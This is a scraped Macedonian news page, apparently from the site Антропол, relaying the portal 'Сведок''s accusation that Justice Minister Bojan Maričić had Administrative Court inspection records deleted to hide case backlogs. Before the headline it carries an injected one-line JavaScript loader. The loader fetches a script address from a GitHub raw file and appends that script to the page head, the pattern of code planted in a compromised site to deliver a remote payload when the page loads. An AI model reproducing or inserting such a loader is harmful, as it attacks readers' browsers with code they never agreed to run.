;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); „Сведок": Маричиќ бриши записници за да го заштити криминалот во Управен Суд - Антропол
АктуелноЛокално

„Сведок”: Маричиќ бриши записници за да го заштити криминалот во Управен Суд

Порталот „Сведок” пишува дека Министерот за правда Бојан Маричиќ се вплетка во скандалот со криминалот во Управниот суд, па и тој, како и претседателот на судот Бурим Рустеми, наредил да се избришат записниците од контролите во Управниот суд, кои 2 години беа јавно достапни на сајтот на Министерството за правда.

Документов, чија содржина ја објавуваме подолу, ги покажува загрижувачките состојби во Управниот суд констатирани уште пред 2 години од Комисија од правда, но за тоа никој до сега ни побарал одговорност, ниту сносел одговорност. Документот носи датум и број од 4.4.2019 година и речиси две години е јавно објавен документ, кој од пред неколку дена е избришан по налог на Маричиќ, обидувајќи се да го скрие скандалот. 

Но, благодарение на алатката за пронаоѓање и враќање на избришани содржини од интернет, Сведок ГО ОБЈАВУВА ИЗБРИШАНИОТ ДОКУМЕНТ СО КОЈ Маричиќ сакаше да го покрие срамот. Сами може да се уверите дека во извештајот се констатирани истите слабости, неиспратени илјадници предмети по жалби за годините 2014, 2015, 2016, 2017 кога претседтелка е Јетмире Ајдини Бошњаку, како и над 100.000 предмети кои не се архивирани за цело време на работење на судот. – пишува Сведок.